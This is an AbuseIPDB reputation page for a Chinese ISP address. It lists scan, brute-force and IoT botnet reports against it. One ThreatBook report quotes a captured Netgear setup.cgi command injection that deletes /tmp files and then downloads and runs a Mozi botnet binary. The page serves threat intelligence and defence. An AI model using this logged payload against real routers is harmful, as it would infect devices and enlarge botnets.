JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 125.41.7.147

125.41.7.147 was found in our database!

This IP was reported 10 times. Confidence of Abuse is 20%: ?

20%

ISP	China Unicom Henan province network
Usage Type	Fixed Line ISP
ASN	AS4837
Hostname(s)	hn.kd.ny.adsl
Domain Name	chinaunicom.cn
Country	🇨🇳 China
City	Zhengzhou, Henan

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 125.41.7.147

Whois 125.41.7.147

IP Abuse Reports for 125.41.7.147:

This IP address has been reported a total of 10 times from 7 distinct sources. 125.41.7.147 was first reported on October 2nd 2021, and the most recent report was 1 month ago.

Old Reports: The most recent abuse report for this IP address is from 1 month ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇺🇸 MPL	2026-04-29 14:07:51 (1 month ago)	tcp/37215 (6 or more attempts)	Port Scan
🇺🇸 cybsecaoccol	2026-04-28 20:29:01 (1 month ago)	unauthorized connection or malicious port scan attempted on tcp port 23 - dr	Port Scan Hacking
🇺🇸 MPL	2026-04-28 07:55:43 (1 month ago)	tcp/2323	Port Scan
🇬🇧 PeravixGroup	2026-04-28 04:55:44 (1 month ago)	Honeypot detection: Mozi IoT botnet payload delivery / infection attempt on port 8080. Severity: CRI ... show more Honeypot detection: Mozi IoT botnet payload delivery / infection attempt on port 8080. Severity: CRITICAL. Aaran.cloud show less	Hacking IoT Targeted
Anonymous	2026-04-27 21:01:28 (1 month ago)	Unauthorized connection attempt on Port 23	Port Scan Hacking Exploited Host
🇬🇧 PeravixGroup	2026-04-26 23:17:47 (1 month ago)	Honeypot detection: Telnet / IoT device brute-force or exploitation attempt on port 23. Severity: HI ... show more Honeypot detection: Telnet / IoT device brute-force or exploitation attempt on port 23. Severity: HIGH. Aaran.cloud show less	IoT Targeted Brute-Force
🇨🇳 ThreatBook.io	2026-04-26 23:01:22 (1 month ago)	ThreatBook Intelligence: Zombie,Dynamic IP more details on https://threatbook.io/ip/125.41.7.147 202 ... show more ThreatBook Intelligence: Zombie,Dynamic IP more details on https://threatbook.io/ip/125.41.7.147 2026-04-26 18:40:05 /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://125.41.7.147:57969/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 show less	SSH
🇬🇧 PeravixGroup	2026-04-26 11:56:53 (1 month ago)	Honeypot detection: IoT / router remote code execution attempt (Mirai/Mozi family) on port 5555. Sev ... show more Honeypot detection: IoT / router remote code execution attempt (Mirai/Mozi family) on port 5555. Severity: CRITICAL. Aaran.cloud show less	Hacking IoT Targeted
🇺🇸 Cyber Crusader	2026-04-25 07:59:49 (1 month ago)	Hundreds of Attempts (at least) to Connect to and Access Firewall Ports	Port Scan Hacking Brute-Force
🇿🇦 IrisFlower	2021-10-02 05:29:18 (4 years ago)	Unauthorized connection attempt detected from IP address 125.41.7.147 to port 8080 [J]	Port Scan Hacking

Showing 1 to 10 of 10 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇰🇷 222.239.251.12

🇮🇷 176.65.185.201

🇩🇪 156.236.31.85

🇭🇰 154.81.15.82

🇸🇬 152.42.236.39

🇺🇸 142.93.3.204

🇺🇸 99.105.201.171

🇱🇺 64.89.160.19

🇨🇳 223.85.251.55

🇩🇪 155.117.127.153

🇳🇱 45.156.87.253

🇧🇷 205.210.31.174

🇺🇸 162.216.150.233

🇧🇷 152.32.199.112

🇺🇸 147.185.132.14

🇺🇸 98.94.39.245

🇷🇴 80.94.92.164

🇩🇪 68.183.220.142

🇬🇧 31.14.254.114

🇰🇼 188.71.232.90